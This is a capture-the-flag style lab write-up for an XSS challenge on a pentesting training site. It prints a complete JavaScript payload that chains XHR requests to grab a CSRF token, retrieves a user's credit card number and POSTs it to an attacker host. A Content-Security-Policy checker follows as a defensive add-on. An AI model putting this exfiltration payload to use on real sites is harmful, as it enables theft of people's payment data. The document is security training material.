Task 19 [Try Now]
Objectives
- Find John's Credit Card Number using an XSS vulnerability on this page
- Display the Credit Card Number in the div with id "result"
- Post the Credit Card Number to a simulated Attacker Server
- No Hardcoded values can be used - everything has to be figured out dynamically
So in this task we have to find the credit card value, print it to <div id="result">...</div>, and POST it to the attacker's server.
Well, let me tell you in advance, the payload for this task will be very lengthy 😛
So here we have a link; when you click it, it redirects you to a new page where, after entering the UID, you can see the credit card number.
The credit card number is in <div id="result">....</div>
So let's use our old XHR friend and complete this task. BTW, the regexes used are /<input type="hidden" value="(.+?)" .+>/ and /<div id="result">(.+?)<\/div>/
```javascript
// The UID is the last four characters of the link text on the page
let a = document.querySelector("a");
let uid = a.innerText.trim().slice(-4);

// Request 1: fetch the linked page and read the CSRF token from its hidden input
const xhttp1 = new XMLHttpRequest();
xhttp1.onreadystatechange = function () {
  if (xhttp1.readyState == 4 && xhttp1.status == 200) {
    const xhttp2 = new XMLHttpRequest();
    let tok = /<input type="hidden" value="(.+?)" .+>/.exec(this.responseText)[1];

    // Request 2: submit the UID with the token and read the card number from the response
    xhttp2.onreadystatechange = function () {
      if (xhttp2.readyState == 4 && xhttp2.status == 200) {
        let cc = /<div id="result">(.+?)<\/div>/.exec(xhttp2.responseText)[1];
        document.querySelector("#result").innerText = cc;

        // Request 3: POST the card number to the simulated attacker server
        const xhttp3 = new XMLHttpRequest();
        xhttp3.open("POST", "https://my-attacker.site", true);
        xhttp3.send("cc=" + cc);
      }
    };
    xhttp2.open("GET", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/19/getcreditcard?uid=" + uid + "&csrf_token=" + tok, true);
    xhttp2.send();
  }
};
xhttp1.open("GET", a.href, true);
xhttp1.send();
```
Since we don't have to worry about the delivery of the credit card to the attacker site, I am not using any .onreadystatechange callback.
For POC, Click Here
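A defender's view of the payload's network behaviour, as an added example that is not part of the original write-up: a simplified Content-Security-Policy `connect-src` check run against the two request targets the payload uses. Only `'self'`, `'none'`, `*` and plain origins are handled, and the page URL and the uid/token values are assumed.

```javascript
// Simplified subset of CSP source matching; real browsers implement more rules.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

function connectAllowed(header, pageUrl, targetUrl) {
  const policy = parseCsp(header);
  // connect-src falls back to default-src; with neither present nothing is restricted.
  const sources = policy["connect-src"] || policy["default-src"];
  if (!sources) return true;
  const page = new URL(pageUrl);
  const target = new URL(targetUrl, pageUrl);
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === "'self'") return target.origin === page.origin;
    if (src === "*") return /^(https?|wss?):$/.test(target.protocol);
    try {
      return new URL(src).origin === target.origin;
    } catch {
      return false; // anything outside this subset is treated as non-matching
    }
  });
}

// Assumed lab page URL, derived from the getcreditcard URL in the write-up.
const PAGE = "http://pentesteracademylab.appspot.com/lab/webapp/jfp/19";
const REQUESTS = [
  // uid and csrf_token values are constructed placeholders
  "http://pentesteracademylab.appspot.com/lab/webapp/jfp/19/getcreditcard?uid=0000&csrf_token=x",
  "https://my-attacker.site",
];

function audit(header) {
  return REQUESTS.map((url) => ({
    origin: new URL(url).origin,
    allowed: connectAllowed(header, PAGE, url),
  }));
}

console.log(audit("connect-src 'self'"));
```

With `connect-src 'self'` the same-origin reads of the CSRF token and card number are still allowed and only the POST to the external server is refused, so the policy limits exfiltration while the XSS itself still has to be fixed at the injection point.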